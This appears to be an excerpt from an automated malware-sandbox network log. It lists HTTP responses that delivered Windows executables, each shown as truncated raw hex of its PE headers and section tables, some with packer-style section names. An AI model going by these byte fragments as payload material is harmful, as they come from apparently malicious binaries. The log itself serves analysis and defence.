00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 05:20:50 GMTContent-Type: application/octet-streamContent-Length: 1891840Last-Modified: Mon, 01 Jul 2024 03:45:22 GMTConnection: keep-aliveETag: "66822652-1cde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 11 21 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 22 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 63 6a 72 70 72 6d 65 00 d0 19 00 00 60 31 00 00 c6 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 63 7a 70 79 6a 77 79 00 10 00 00 00 30 4b 00 00 04 00 00 00 b8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 bc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 05:21:00 GMTContent-Type: application/octet-streamContent-Length: 2564096Last-Modified: Mon, 01 Jul 2024 04:14:30 GMTConnection: keep-aliveETag: "66822d26-272000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 dc 95 c0 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 c0 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 f0 9d 00 f3 0c 00 00 14 fd 9d 00 